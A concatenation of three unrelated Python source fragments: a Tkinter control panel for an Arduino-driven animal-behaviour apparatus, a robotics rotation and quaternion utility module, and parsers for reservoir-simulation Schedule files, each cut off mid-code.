self.acclimation_sb = Spinbox(frame, from_=acclimation_min, to=acclimation_max, increment=0.5, textvariable=acclimation_period,font="Verdana 11", validate="key",
validatecommand=vcmd_acclimation, width = 10).grid(row=0,column=1,sticky=EW,rowspan=2, columnspan = 1)
self.acc_ord = Label(frame, text="min", justify=RIGHT,height=2, font="fixedsys 10 bold").grid(row=0,column=2,sticky=W,rowspan=2,padx=(0,2))
#ITI
self.iti = Label(frame, text="Intertrial Interval", justify=LEFT,height=2, width=20).grid(row=2,column=0,sticky=W,rowspan=2,padx=(2,0))
self.iti_sb = Spinbox(frame, from_=iti_min, to=iti_max, increment=0.5, textvariable=iti,font="Verdana 11", validate="key",
validatecommand=vcmd_iti, width = 10).grid(row=2,column=1,sticky=EW,rowspan=2, columnspan = 1)
self.iti_ord = Label(frame, text="min", justify=RIGHT,height=2, font="fixedsys 10 bold").grid(row=2,column=2,sticky=W,rowspan=2,padx=(0,2))
#WEIGHT
self.weight = Label(frame, text="Weight Threshold", justify=LEFT,height=2, width=20).grid(row=4,column=0,sticky=W,rowspan=2,padx=(2,0))
self.weight_sb = Spinbox(frame, from_=weight_min, to=weight_max, increment=1, textvariable=weight,font="Verdana 11", validate="key",
validatecommand=vcmd_weight, width = 10).grid(row=4,column=1,sticky=EW,rowspan=2, columnspan = 1)
self.weight_ord = Label(frame, text="grams", justify=RIGHT,height=2, font="fixedsys 10 bold").grid(row=4,column=2,sticky=W,rowspan=2,padx=(0,2))
#SPEED
self.speed = Label(frame, text="Speed", justify=LEFT,height=2, width=20).grid(row=6,column=0,sticky=W,rowspan=2,padx=(2,0))
self.speed_sb = Spinbox(frame, from_=speed_min, to=speed_max, increment=0.1, textvariable=speed,font="Verdana 11", validate="key",
validatecommand=vcmd_speed, width = 10).grid(row=6,column=1,sticky=EW,rowspan=2, columnspan = 1)
self.speed_ord = Label(frame, text="mm/s", justify=RIGHT,height=2, font="fixedsys 10 bold").grid(row=6,column=2,sticky=W,rowspan=2,padx=(0,2))
#NoT
self.NoT = Label(frame, text="Number of Trials", justify=LEFT,height=2, width=20).grid(row=8,column=0,sticky=W,rowspan=2,padx=(2,0))
self.NoT_sb = Spinbox(frame, from_=NoT_min, to=NoT_max, increment=1, textvariable=NoT,font="Verdana 11", validate="key",
validatecommand=vcmd_NoT, width = 10).grid(row=8,column=1,sticky=EW,rowspan=2, columnspan = 1)
self.NoT_ord = Label(frame, text=" ", justify=RIGHT,height=2, font="fixedsys 10 bold").grid(row=8,column=2,sticky=W,rowspan=2,padx=(0,2))
#TIME
global timestr
timestr = StringVar()
global time_label
time_label = Label(frame, textvariable=timestr,relief=SUNKEN,borderwidth=3, font="device 10", bg="white", padx=8, pady=1)
time_label.grid(row=10,column=0,rowspan=2)
#CLOCK Control
self.startbutton = Tkinter.Button(frame,text=u"Start", command=self.Start, font="fixedsys 10 bold",borderwidth=2, width = 2).grid(row=10,column=1,sticky=W,rowspan=2)
self.stopbutton = Tkinter.Button(frame,text=u"Stop", command=self.Stop, font="fixedsys 10 bold",borderwidth=2, width = 2).grid(row=10,column=1,rowspan=2)
self.resetbutton = Tkinter.Button(frame,text=u"Reset", command=self.Reset, font="fixedsys 10 bold",borderwidth=2, width = 2).grid(row=10,column=1,sticky=E,rowspan=2)
#self.quitbutton = Tkinter.Button(frame,text=u"Quit", command=self.quit, font="fixedsys 10 bold",borderwidth=2).grid(row=10,column=2,sticky=E,rowspan=2)
#SEPARATORS
#those get poorly updated when the window is e.g. covered with the terminal .... maybe get removed in v0.2
separator1=Frame(frame,height=10,bg="").grid(row=12, columnspan=4,sticky=NSEW,rowspan=1)
separator2=Frame(frame,height=1,bg="").grid(row=14, columnspan=4,sticky=NSEW,rowspan=1)
separator3=Frame(frame,height=10,bg="").grid(row=16, columnspan=4,sticky=NSEW,rowspan=1)
separator4=Frame(frame,height=10,bg="").grid(row=21, columnspan=4,sticky=NSEW,rowspan=1)
separator5=Frame(frame,height=10,bg="").grid(row=23, columnspan=4,sticky=NSEW,rowspan=1)
#LED Control
#No function till now!
#led_a = Checkbutton(frame,text=" LED A",font="fixedsys 8")
#led_a.grid(row=13,column=0,sticky=W,padx=5)
#led_b = Checkbutton(frame,text=" LED B",font="fixedsys 8")
#led_b.grid(row=15,column=0,sticky=W,padx=5)
global weight_A
weight_A_l = Label(frame,text="Weight A", height=1).grid(row=13,column=0,sticky=E)
weight_A = Label(frame,text=weight_var_A, height=1, relief=SUNKEN, anchor=N)
weight_A.grid(row=13,column=1,sticky=NSEW)
weight_A_ord = Label(frame, text="grams", justify=RIGHT, font="fixedsys 10 bold").grid(row=13,column=2,sticky=W,padx=(0,2))
global weight_B
weight_A_l = Label(frame,text="Weight B", height=1).grid(row=15,column=0,sticky=E)
weight_B = Label(frame,text=weight_var_B, height=1, relief=SUNKEN, anchor=N)
weight_B.grid(row=15,column=1,sticky=NSEW)
weight_B_ord = Label(frame, text="grams", justify=RIGHT, font="fixedsys 10 bold").grid(row=15,column=2,sticky=W,padx=(0,2))
#SLIDERS
global slide_A,slide_A_label2
slide_A_label = Label(frame,text="Pos A").grid(row=18,column=0,sticky=E,rowspan=2,pady=(0,3))
slide_A = Scale(frame, from_=140, to=0,orient=HORIZONTAL,showvalue=0,sliderlength=20,length=150,troughcolor="white")
slide_A.grid(row=18,column=1,columnspan=1,sticky=W,rowspan=2)
slide_A_label2 = Label(frame,text=servo1_pos, width=5)
slide_A_label2.grid(row=18,column=2,sticky=W,rowspan=2,pady=(0,8),padx=(0,10))
#RST A
global slide_A_rst
slide_A_rst = Button(frame,text="A Reset",font="fixedsys 10 bold",command=lambda: self.hard_reset("A"),bg="gray" )
slide_A_rst.grid(row=18,column=0,sticky=W,ipadx=5,padx=5)
global slide_B,slide_B_label2
slide_B_label = Label(frame,text="Pos B").grid(row=20,column=0,sticky=E,rowspan=2,pady=(0,13))
slide_B = Scale(frame, from_=140, to=0,orient=HORIZONTAL,showvalue=0,sliderlength=20,length=150,troughcolor="white")
slide_B.grid(row=20,column=1,columnspan=1,sticky=W,rowspan=2)
slide_B_label2 = Label(frame,text=servo2_pos, width=5)
slide_B_label2.grid(row=20,column=2,sticky=W,rowspan=2,pady=(0,16),padx=(0,10))
#RST B
global slide_B_rst
slide_B_rst = Button(frame,text="B Reset",font="fixedsys 10 bold", command=lambda: self.hard_reset("B"),bg="gray" )
slide_B_rst.grid(row=20,column=0,sticky=W,ipadx=5,padx=5)
#STATUS BAR
global status_field
status_field = Label(frame,text="... waiting ", fg="black",height=2, relief=SUNKEN, justify=LEFT)
status_field.grid(row=22,column=0,columnspan=4,sticky=NSEW,padx=(2,2))
#TEXT Fields
global lines
lines=NoT.get()
global trial_window
trial_window=Text(frame,height=lines,width=12,font="fixedsys 8",spacing2=1,spacing3=2)
trial_window.grid(row=24,column=0,sticky=W)
global sides_window
sides_window=Text(frame,height=lines,width=12,font="fixedsys 8",spacing2=1,spacing3=2)
sides_window.grid(row=24,column=0,sticky=E)
global lat_OFF_window
lat_OFF_window=Text(frame,height=lines,width=12,font="fixedsys 8",spacing2=1,spacing3=2)
lat_OFF_window.grid(row=24,column=1,sticky=W)
#global dist_OFF_window
#dist_OFF_window=Text(frame,height=lines,width=12,font="fixedsys 8",spacing2=1,spacing3=2)
#dist_OFF_window.grid(row=24,column=1,sticky=W)
#global dist_ON_window
#dist_ON_window=Text(frame,height=lines,width=12,font="fixedsys 8",spacing2=1,spacing3=2)
#dist_ON_window.grid(row=24,column=1)
#global tof_window
#tof_window=Text(frame,height=lines,width=12,font="fixedsys 8",spacing2=1,spacing3=2)
#tof_window.grid(row=24,column=1,sticky=E)
global lat_ON_window
lat_ON_window=Text(frame,height=lines,width=12,font="fixedsys 8",spacing2=1,spacing3=2)
lat_ON_window.grid(row=24,column=1,sticky=E)
global its_window
its_window=Text(frame,height=lines,width=8,font="fixedsys 8",spacing2=1,spacing3=2)
its_window.grid(row=24,column=2,sticky=W)
trial_window.insert(END,"TRIAL:"+"\n")
sides_window.insert(END, "ARM:"+"\n")
lat_OFF_window.insert(END,"LAT_OFF:"+"\n")
#dist_OFF_window.insert(END,"DIST_OFF:"+"\n")
lat_ON_window.insert(END,"LAT_ON:"+"\n")
#dist_ON_window.insert(END,"DIST_ON:"+"\n")
#tof_window.insert(END,"ToF:"+"\n")
its_window.insert(END,"ITS:"+"\n")
self.makeWidgets()
def hard_reset(self,arm):
""" Kinda the Emergency Reset, e.g. also stops the clock """
global reset_var
if (arm == "A"):
reset_var=1
if (arm == "B"):
reset_var=2
def round_to(self,n, precision):
correction = 0.5 if n >= 0 else -0.5
return int( n/precision+correction ) * precision
def round_to_5(self,n):
return self.round_to(n, 0.5)
def _update_values(self):
""" This function updates and parses the values read from the arduino """
global old_vals_to_PC
global vals_to_PC
global weight_var_A
global weight_var_B
global servo1_pos
global servo2_pos
global distanceA
global distanceB
line = self._readline()
vals_to_PC=line.split(',')
if (self.validate_vals(4)==True):
old_vals_to_PC=vals_to_PC
if (self.validate_vals(4)==False):
print vals_to_PC
vals_to_PC=old_vals_to_PC
weight_var_A = int(round( (0.5*float(vals_to_PC[0])+0.5*float(old_vals_to_PC[0])),0))
weight_var_B = int(round( (0.5*float(vals_to_PC[1])+0.5*float(old_vals_to_PC[1])),0))
servo1_pos = float(round( (0.5*float(vals_to_PC[2])+0.5*float(old_vals_to_PC[2])),0))
servo2_pos = float(round( (0.5*float(vals_to_PC[3])+0.5*float(old_vals_to_PC[3])),0))
weight_var_A = self.round_to_5(round((0.0749129009*float(weight_var_A)-0.9088320258),2))
weight_var_B = self.round_to_5(round((0.0763157054*float(weight_var_B)-0.9683740794),2))
#update labels
weight_A.configure(text=weight_var_A)
weight_B.configure(text=weight_var_B)
if weight_var_A>=float(weight.get()):
weight_A.configure(bg='lawn green')
else:
weight_A.configure(bg=defaultbg)
if weight_var_B>=float(weight.get()):
weight_B.configure(bg='lawn green')
else:
weight_B.configure(bg=defaultbg)
distanceA = int( round(((-5.92613311630418E-8)*(servo1_pos*servo1_pos*servo1_pos)+0.0002948917*(servo1_pos*servo1_pos)-0.3487265211*servo1_pos+115.5057514142),0))
distanceB = int( round(((7.19346722522172E-8)*(servo2_pos*servo2_pos*servo2_pos)-0.0003226514*(servo2_pos*servo2_pos)+0.3380168316*servo2_pos+49.1057851055),0))
if (distanceA <= 1):
distanceA = 0
if (distanceB <= 1):
distanceB = 0
slide_A.set(distanceA)
slide_A_label2.configure(text=distanceA)
slide_B.set(distanceB)
slide_B_label2.configure(text=distanceB)
if (distanceA<140):
slide_A_rst.config(bg="IndianRed1")
else:
slide_A_rst.config(bg="gray")
if (distanceB<140):
slide_B_rst.config(bg="IndianRed1")
else:
slide_B_rst.config(bg="gray")
def validate_vals(self,length):
""" As not all values from the arduino are valid we need to make sense out of the gibberish """
global vals_to_PC, old_vals_to_PC
try:
for x in range(0,length):
vals_to_PC[x].isdigit()
a=int(vals_to_PC[x])
return True
except (ValueError, IndexError) as e:
print e
print vals_to_PC
vals_to_PC=old_vals_to_PC
return False
except:
print "Other Error!"
print vals_to_PC
def _OnValidate_acclimation(self, d, i, P, s, S, v, V, W):
"""This function checks if the input values into the spinboxes are valid"""
if S in '0123456789.':
try:
float(P)
return (float(P)>=acclimation_min) and (float(P)<=acclimation_max)
except ValueError:
return False
else:
return False
def _OnValidate_iti(self, d, i, P, s, S, v, V, W):
"""This function checks if the input values into the spinboxes are valid"""
if S in '0123456789.':
try:
float(P)
return (float(P)>=iti_min) and (float(P)<=iti_max)
except ValueError:
return False
else:
return False
def _OnValidate_weight(self, d, i, P, s, S, v, V, W):
"""This function checks if the input values into the spinboxes are valid"""
if S in '0123456789.':
try:
float(P)
return (float(P)>=weight_min) and (float(P)<=weight_max)
except ValueError:
return False
else:
return False
def _OnValidate_speed(self, d, i, P, s, S, v, V, W):
"""This function checks if the input values into the spinboxes are valid"""
if S in '0123456789.':
try:
float(P)
return (float(P)>=speed_min) and (float(P)<=speed_max)
except ValueError:
return False
else:
return False
def _OnValidate_NoT(self, d, i, P, s, S, v, V, W):
"""This function checks if the input values into the spinboxes are valid"""
if S in '0123456789.':
try:
float(P)
return (float(P)>=NoT_min) and (float(P)<=NoT_max)
except ValueError:
return False
else:
return False
def _readline(self):
eol = b'\n'
leneol = len(eol)
line = bytearray()
while True:
c = ser.read(1)
if c:
line += c
if line[-leneol:] == eol:
break
else:
break
return bytes(line)
def makeWidgets(self):
""" Make the time label. """
self._setTime(self._elapsedtime)
def _update(self):
""" Update the label with elapsed time. """
self._elapsedtime = time.time() - self._start
self._setTime(self._elapsedtime)
self._timer = self.after(10, self._update)
seconds=self._elapsedtime
self.timed_control_new(seconds)
def _setTime(self, elap):
global timestr
timestr = StringVar()
global time_label
""" Set the time string to Minutes:Seconds:Hundreths """
minutes = int(elap/60)
seconds = int(elap - minutes*60.0)
hseconds = int((elap - minutes*60.0 - seconds)*100)
timestr.set('%02d:%02d:%02d' % (minutes, seconds, hseconds))
time_label.configure(textvariable=timestr)
def Start(self):
global running_var
global servo1_dir
""" Start the stopwatch, ignore if running. """
if not self._running:
self._start = time.time() - self._elapsedtime
self._update()
self._running = 1
running_var = 1
def Stop(self):
global running_var
global servoA_dir
global servoB_dir
global reset_var
reset_var = 0
""" Stop the stopwatch, ignore if stopped. """
if self._running:
self.after_cancel(self._timer)
self._elapsedtime = time.time() - self._start
self._setTime(self._elapsedtime)
self._running = 0
servoA_dir = 1
servoB_dir = 1
def Reset(self):
global running_var
global status_field
global servoA_dir
global servoB_dir
""" Reset the stopwatch. """
self._start = time.time()
self._elapsedtime = 0.0
self._setTime(self._elapsedtime)
status_field.config(text="... waiting",fg="black")
servoA_dir = 1
servoB_dir = 1
global curr_NoT
curr_NoT = 0
global lat_OFF_list
lat_OFF_list = []
global lat_ON_list
lat_ON_list = []
global trial_list
trial_list = []
trial_window.delete(1.0, END)
lat_OFF_window.delete(1.0, END)
lat_ON_window.delete(1.0, END)
global sides_list
sides_list = []
sides_window.delete(1.0, END)
global its_list
its_list = []
its_window.delete(1.0, END)
global its
its = 0
global start_t
start_t = 0.0
global stop_OFF_t
stop_OFF_t = 0.0
global stop_ON_t
stop_ON_t = 0.0
global last_t
last_t = 0.0
global lat_OFF
lat_OFF | |
<gh_stars>100-1000
""" This file defines general utility functions and classes. """
import math
import numpy as np
# import sys
#
# sys.path.append('/home/rkojcev/ros_python3/devel/lib')
import PyKDL as kdl
class BundleType():
"""
This class bundles many fields, similar to a record or a mutable
namedtuple.
"""
def __init__(self, variables):
for var, val in variables.items():
object.__setattr__(self, var, val)
# Freeze fields so new ones cannot be set.
def __setattr__(self, key, value):
if not hasattr(self, key):
raise AttributeError("%r has no attribute %s" % (self, key))
object.__setattr__(self, key, value)
def checkShape(value, expectedShape, name=''):
"""
Throws a ValueError if value.shape != expectedShape.
Args:
value: Matrix to shape check.
expectedShape: A tuple or list of integers.
name: An optional name to add to the exception message.
"""
if value.shape != tuple(expectedShape):
raise ValueError('Shape mismatch %s: Expected %s, got %s' %
(name, str(expectedShape), str(value.shape)))
def finiteDifferences(func, inputs, funcOutputShape=(), epsilon=1e-5):
"""
Computes gradients via finite differences.
derivative = (func(x+epsilon) - func(x-epsilon)) / (2*epsilon)
Args:
func: Function to compute gradient of. Inputs and outputs can be
arbitrary dimension.
inputs: Vector value to compute gradient at.
funcOutputShape: Shape of the output of func. Default is
empty-tuple, which works for scalar-valued functions.
epsilon: Difference to use for computing gradient.
Returns:
Gradient vector of each dimension of func with respect to each
dimension of input.
"""
gradient = np.zeros(inputs.shape+funcOutputShape)
for idx, _ in np.ndenumerate(inputs):
testInput = np.copy(inputs)
testInput[idx] += epsilon
objD1 = func(testInput)
assert objD1.shape == funcOutputShape
testInput = np.copy(inputs)
testInput[idx] -= epsilon
objD2 = func(testInput)
assert objD2.shape == funcOutputShape
diff = (objD1 - objD2) / (2 * epsilon)
gradient[idx] += diff
return gradient
def approxEqual(a01, b01, threshold=1e-5):
"""
Return whether two numbers are equal within an absolute threshold.
Returns:
True if a01 and b01 are equal within threshold.
"""
return np.all(np.abs(a01 - b01) < threshold)
def extractCondition(hyperparams, m01):
"""
Pull the relevant hyperparameters corresponding to the specified
condition, and return a new hyperparameter dictionary.
"""
return {var: val[m01] if isinstance(val, list) else val
for var, val in hyperparams.items()}
def getEePoints(offsets, eePos, eeRot):
"""
Helper method for computing the end effector points given a
position, rotation matrix, and offsets for each of the ee points.
Args:
offsets: N x 3 array where N is the number of points.
eePos: 1 x 3 array of the end effector position.
eeRot: 3 x 3 rotation matrix of the end effector.
Returns:
3 x N array of end effector points.
"""
return np.asarray(eeRot.dot(offsets.T) + eePos.T)
def getPosition(tf1, target, source, time):
"""
Utility function that uses tf to return the position of target
relative to source at time
tf1: Object that implements TransformListener
target: Valid label corresponding to target link
source: Valid label corresponding to source link
time: Time given in TF's time structure of secs and nsecs
"""
# Calculate the quaternion data for the relative position
# between the target and source.
# translation, rot = tf1.lookupTransform(target, source, time)
position, _ = tf1.lookupTransform(source, target, time)
position = np.asarray(position)
return position
def getRotationMatrix(angle, direction, point=None):
"""Return matrix to rotate about axis defined by point and direction.
>>> rot = rotation_matrix(math.pi/2, [0, 0, 1], [1, 0, 0])
>>> np.allclose(np.dot(R, [0, 0, 0, 1]), [1, -1, 0, 1])
True
>>> angle = (random.random() - 0.5) * (2*math.pi)
>>> direc = np.random.random(3) - 0.5
>>> point = np.random.random(3) - 0.5
>>> R0 = rotation_matrix(angle, direc, point)
>>> R1 = rotation_matrix(angle-2*math.pi, direc, point)
>>> is_same_transform(R0, R1)
True
>>> R0 = rotation_matrix(angle, direc, point)
>>> R1 = rotation_matrix(-angle, -direc, point)
>>> is_same_transform(R0, R1)
True
>>> I = np.identity(4, np.float64)
>>> np.allclose(I, rotation_matrix(math.pi*2, direc))
True
>>> np.allclose(2, np.trace(rotation_matrix(math.pi/2,
... direc, point)))
True
"""
sina = math.sin(angle)
cosa = math.cos(angle)
# rotation matrix around unit vector
rot = np.diag([cosa, cosa, cosa])
rot += np.outer(direction, direction) * (1.0 - cosa)
direction *= sina
rot += np.array([[0.0, -direction[2], direction[1]],
[direction[2], 0.0, -direction[0]],
[-direction[1], direction[0], 0.0]])
matrix = np.identity(4)
matrix[:3, :3] = rot
if point is not None:
# rotation not around origin
point = np.array(point[:3], dtype=np.float64, copy=False)
matrix[:3, 3] = point - np.dot(rot, point)
return matrix
def rotationFromMatrix(matrix):
"""Return rotation angle and axis from rotation matrix.
>>> angle = (random.random() - 0.5) * (2*math.pi)
>>> direc = np.random.random(3) - 0.5
>>> point = np.random.random(3) - 0.5
>>> R0 = rotation_matrix(angle, direc, point)
>>> angle, direc, point = rotationFromMatrix(R0)
>>> R1 = rotation_matrix(angle, direc, point)
>>> is_same_transform(R0, R1)
True
"""
rot = np.array(matrix, dtype=np.float64, copy=False)
r33 = rot[:3, :3]
# direction: unit eigenvector of r33 corresponding to eigenvalue of 1
w00, w01 = np.linalg.eig(r33.T)
i = np.where(abs(np.real(w00) - 1.0) < 1e-8)[0]
if not i:
raise ValueError("no unit eigenvector corresponding to eigenvalue 1")
direction = np.real(w01[:, i[-1]]).squeeze()
# point: unit eigenvector of r33 corresponding to eigenvalue of 1
w00, q00 = np.linalg.eig(rot)
i = np.where(abs(np.real(w00) - 1.0) < 1e-8)[0]
if not i:
raise ValueError("no unit eigenvector corresponding to eigenvalue 1")
point = np.real(q00[:, i[-1]]).squeeze()
point /= point[3]
# rotation angle depending on direction
cosa = (np.trace(r33) - 1.0) / 2.0
if abs(direction[2]) > 1e-8:
sina = (rot[1, 0] + (cosa-1.0)*direction[0]*direction[1]) / direction[2]
elif abs(direction[1]) > 1e-8:
sina = (rot[0, 2] + (cosa-1.0)*direction[0]*direction[2]) / direction[1]
else:
sina = (rot[2, 1] + (cosa-1.0)*direction[1]*direction[2]) / direction[0]
angle = math.atan2(sina, cosa)
return angle, direction, point
def quaternionFromMatrix(matrix, isprecise=False):
"""Return quaternion from rotation matrix.
If isprecise is True, the input matrix is assumed to be a precise rotation
matrix and a faster algorithm is used.
>>> q00 = quaternionFromMatrix(np.identity(4), True)
>>> np.allclose(q, [1, 0, 0, 0])
True
>>> q00 = quaternionFromMatrix(np.diag([1, -1, -1, 1]))
>>> np.allclose(q, [0, 1, 0, 0]) or np.allclose(q, [0, -1, 0, 0])
True
>>> R = rotation_matrix(0.123, (1, 2, 3))
>>> q00 = quaternionFromMatrix(R, True)
>>> np.allclose(q, [0.9981095, 0.0164262, 0.0328524, 0.0492786])
True
>>> R = [[-0.545, 0.797, 0.260, 0], [0.733, 0.603, -0.313, 0],
... [-0.407, 0.021, -0.913, 0], [0, 0, 0, 1]]
>>> q00 = quaternionFromMatrix(R)
>>> np.allclose(q, [0.19069, 0.43736, 0.87485, -0.083611])
True
>>> R = [[0.395, 0.362, 0.843, 0], [-0.626, 0.796, -0.056, 0],
... [-0.677, -0.498, 0.529, 0], [0, 0, 0, 1]]
>>> q00 = quaternionFromMatrix(R)
>>> np.allclose(q, [0.82336615, -0.13610694, 0.46344705, -0.29792603])
True
>>> R = random_rotation_matrix()
>>> q00 = quaternionFromMatrix(R)
>>> is_same_transform(R, quaternion_matrix(q))
True
>>> is_same_quaternion(quaternionFromMatrix(R, isprecise=False),
... quaternionFromMatrix(R, isprecise=True))
True
>>> R = euler_matrix(0.0, 0.0, np.pi/2.0)
>>> is_same_quaternion(quaternionFromMatrix(R, isprecise=False),
... quaternionFromMatrix(R, isprecise=True))
True
"""
matrix = np.array(matrix, dtype=np.float64, copy=False)[:4, :4]
if isprecise:
q00 = np.empty((4, ))
t00 = np.trace(matrix)
if t00 > matrix[3, 3]:
q00[0] = t00
q00[3] = matrix[1, 0] - matrix[0, 1]
q00[2] = matrix[0, 2] - matrix[2, 0]
q00[1] = matrix[2, 1] - matrix[1, 2]
else:
i, j, k = 0, 1, 2
if matrix[1, 1] > matrix[0, 0]:
i, j, k = 1, 2, 0
if matrix[2, 2] > matrix[i, i]:
i, j, k = 2, 0, 1
t00 = matrix[i, i] - (matrix[j, j] + matrix[k, k]) + matrix[3, 3]
q00[i] = t00
q00[j] = matrix[i, j] + matrix[j, i]
q00[k] = matrix[k, i] + matrix[i, k]
q00[3] = matrix[k, j] - matrix[j, k]
q00 = q00[[3, 0, 1, 2]]
q00 *= 0.5 / math.sqrt(t00 * matrix[3, 3])
else:
m00 = matrix[0, 0]
m01 = matrix[0, 1]
m02 = matrix[0, 2]
m10 = matrix[1, 0]
m11 = matrix[1, 1]
m12 = matrix[1, 2]
m20 = matrix[2, 0]
m21 = matrix[2, 1]
m22 = matrix[2, 2]
# symmetric matrix k00
k00 = np.array([[m00-m11-m22, 0.0, 0.0, 0.0],
[m01+m10, m11-m00-m22, 0.0, 0.0],
[m02+m20, m12+m21, m22-m00-m11, 0.0],
[m21-m12, m02-m20, m10-m01, m00+m11+m22]])
k00 /= 3.0
# quaternion is eigenvector of k00 that corresponds to largest eigenvalue
w00, v00 = np.linalg.eigh(k00)
q00 = v00[[3, 0, 1, 2], np.argmax(w00)]
if q00[0] < 0.0:
np.negative(q00, q00)
# exchange (w, x, y, z) to (x, y, z, w)
qNew = np.empty(4)
qNew[:3] = q00[1:]
qNew[3] = q00[0]
return qNew
def jointListToKdl(q00):
""" Return KDL JntArray converted from list q00 """
if q00 is None:
return None
if isinstance(q00, np.matrix) and q00.shape[1] == 0:
q00 = q00.T.tolist()[0]
qKdl | |
"""Functions for reading Schedule input files: net, cnt, tub, ev
"""
from datetime import datetime
import roxar
import roxar.events
def _get_wellname(schedname):
"""Based on Schedule well name, including branch symbol, return well and wellbore names
"""
iloc = schedname.find('%')
if iloc > 0:
well_name = schedname[:iloc]
else:
well_name = schedname
return well_name
def _check_rest(datestr, symb):
"""Check if date contains mixed symbols like SOS + 1 MONTH
"""
rest = datestr.strip(symb)
rest = rest.strip()
if rest != '':
errmes = 'Error reading Schedule file. Cannot handle date string ' + datestr
raise ValueError(errmes)
return None
def _read_date(datestr, line_no, symbdate):
"""Read date from Schedule input files
"""
for key, value in symbdate.items():
estr = '\"' + key + '\"'
ix1 = datestr.find(estr)
if ix1 >= 0:
_check_rest(datestr, estr)
return value
estr = "\'" + key + "\'"
ix1 = datestr.find(estr)
if ix1 >= 0:
_check_rest(datestr, estr)
return value
ix1 = datestr.find(key)
if ix1 >= 0:
_check_rest(datestr, key)
return value
sepdef = (r'.', r'-', r'*', r'+', r':', r';', '\\', r'/')
dateok = False
for sep in sepdef:
ix1 = datestr.find(sep)
if ix1 >= 0:
terms = datestr.split(sep)
try:
day = int(terms[0])
month = int(terms[1])
year = int(terms[2])
dateok = True
break
except:
errmes = 'Cannot read date format: ' + datestr + ' found in line ' + str(line_no) + '.'
raise ValueError(errmes)
if not dateok:
ida = 0
imo = 3
iye = 6
try:
day = int(datestr[ida:ida+2])
month = int(datestr[imo:imo+2])
year = int(datestr[iye:iye+4])
except:
errmes = 'Cannot read date format: ' + datestr + ' found in line ' + str(line_no) + '.'
raise ValueError(errmes)
return datetime(year, month, day)
def _read_items(line, nitem, line_no):
"""Interpret data in line, including repeated counts
"""
nval = 0
line = line.replace(',', ' ')
terms = line.split()
qtxt = False
# First handle quotations
ite = []
for trm in terms:
if trm.startswith('/'):
break
elif trm.startswith("\'"):
if trm.endswith("\'"):
trm = trm.replace("\'", '')
ite.append(trm)
nval += 1
else:
txt = trm
qtxt = True
elif trm.startswith('\"'):
if trm.endswith('\"'):
trm = trm.replace('\"', '')
ite.append(trm)
nval += 1
else:
txt = trm
qtxt = True
elif qtxt:
txt = txt + trm
if txt.endswith("\'"):
txt = txt.replace("\'", '')
ite.append(txt)
nval += 1
qtxt = False
elif txt.endswith('\"'):
txt = txt.replace('\"', '')
ite.append(txt)
nval += 1
qtxt = False
else:
ite.append(trm)
# Handle repeated counts:
items = []
nval = 0
for trm in ite:
iloc = trm.find('*')
if iloc >= 0:
if trm == '*':
items.append(trm)
nval += 1
else:
scount = trm.replace('*', '')
try:
ncount = int(scount)
except ValueError as e:
errmes = 'Error reading Schedule file, line ' + str(line_no) + ': ' + trm
raise ValueError(errmes)
for itr in range(ncount):
items.append('*')
nval += 1
else:
items.append(trm)
nval += 1
if nval < nitem:
for itr in range(nval, nitem):
items.append('*')
return items
def _read_float(item, line_no):
val = None
if item != '*':
try:
val = float(item)
except ValueError:
errmes = (
'Failed to read float value in Schedule file, line '
+ str(line_no)
+ ': '
+ item)
raise ValueError(errmes)
return val
def _read_int(item, line_no):
val = None
if item != '*':
try:
val = int(item)
except ValueError:
errmes = (
'Failed to read integer value in Schedule file, line '
+ str(line_no)
+ ': '
+ item)
raise ValueError(errmes)
return val
def read_schedule_net(file_name, symbdate):
"""Read Schedule net file with well group definitions
Args:
file_name (str): File name for event file
symbdate (dictionary of datetime): Dates for symbolic dates, like SOS
"""
try:
pfil = open(file_name, 'r')
except OSError as e:
errmes = 'Error opening file ' + file_name + '\n' + str(e)
raise OSError(errmes)
event_date = symbdate['SOS']
elist = []
line_no = 0
while True:
try:
line = pfil.readline()
except IOError:
errmes = 'Error reading Schedule net file, line ' + str(line_no + 1)
raise IOError(errmes)
if not line:
break
line_no += 1
temp = line.strip()
ic2 = temp.find('*')
if temp == '':
pass # Skip blank lines
elif temp.startswith('--'):
pass # Skip comments starting with --
else:
terms = temp.split()
if terms[0] == '*DATE':
event_date = _read_date(terms[1], line_no, symbdate)
elif terms[0] == '*GROUPNODE':
is_leaf = False
elif terms[0] == '*LEAFNODE':
is_leaf = True
elif ic2 >= 0:
errstr = 'Unexpected keyword: ' + terms[0]
raise ValueError(errstr)
else:
trm0 = terms[0].strip("\'")
trm1 = terms[1].strip("\'")
eve = roxar.events.Event.create(roxar.EventType.GMEMBER, event_date, [trm1])
eve['MEMBER'] = trm0
elist.append(eve)
if is_leaf: #Default well info
eve = roxar.events.Event.create(roxar.EventType.WTYPE, event_date, [trm0])
eve['TYPE'] = 'Producer'
eve['PHASE'] = 'Oil'
elist.append(eve)
pfil.close()
return elist
def read_schedule_ev(file_name, symbdate, trajectory_type='Drilled trajectory'):
"""Read Schedule event file
Args:
file_name (str): File name for event file
symbdate (dictionary of datetime): Dates for symbolic dates, like SOS
trajectory_type (str): RMS trajectory definition
"""
try:
pfil = open(file_name, 'r')
except OSError as e:
errmes = 'Error opening file ' + file_name + '\n' + str(e)
raise OSError(errmes)
event_date = symbdate['SOS']
elist = []
well_name = 'xxx'
wellbore_name = well_name
# unit = 'METRIC' Currently not used
line_no = 0
wperfno = dict()
is_wconhist = False
def_mdstart = 0.
def_mdend = 10000.
wells_def_mdstart = [] # List of wells with defaulted MDSTART
wells_def_mdend = []
while True:
try:
line = pfil.readline()
except IOerror:
errmes = 'Error reading Schedule event file, line ' + str(line_no + 1)
raise IOError(errmes)
if not line:
break
line_no = line_no + 1
temp = line.strip()
utemp = temp.upper()
if temp == '':
pass # Skip blank lines
elif temp.startswith('--'):
pass # Skip comments starting with --
else:
terms = utemp.split()
no_terms = len(terms)
if terms[0] == 'WELLNAME':
terms = temp.split()
well_name = _get_wellname(terms[1])
wellbore_name = terms[1]
wperfno[wellbore_name] = 0
elif terms[0] == 'UNITS':
pass
# unit = terms[1] # Currently not used
elif no_terms > 1:
if no_terms > 2 and terms[2].find('(') >= 0:
id2 = 0
for i in range(2,no_terms):
if terms[i].find(')') >= 0:
id2 = i + 1
id3 = id2 + 1
id4 = id3 + 1
id5 = id4 + 1
id6 = id5 + 1
break
if id2 == 0:
errmes = 'Missing left bracket in line ' + str(line_no)
raise ValueError(errmes)
else:
id2 = 2
id3 = 3
id4 = 4
id5 = 5
id6 = 6
if is_wconhist:
is_wconhist = False
rdat = _read_items(temp, 9, line_no)
# is_open = rdat[0] # Currently not used
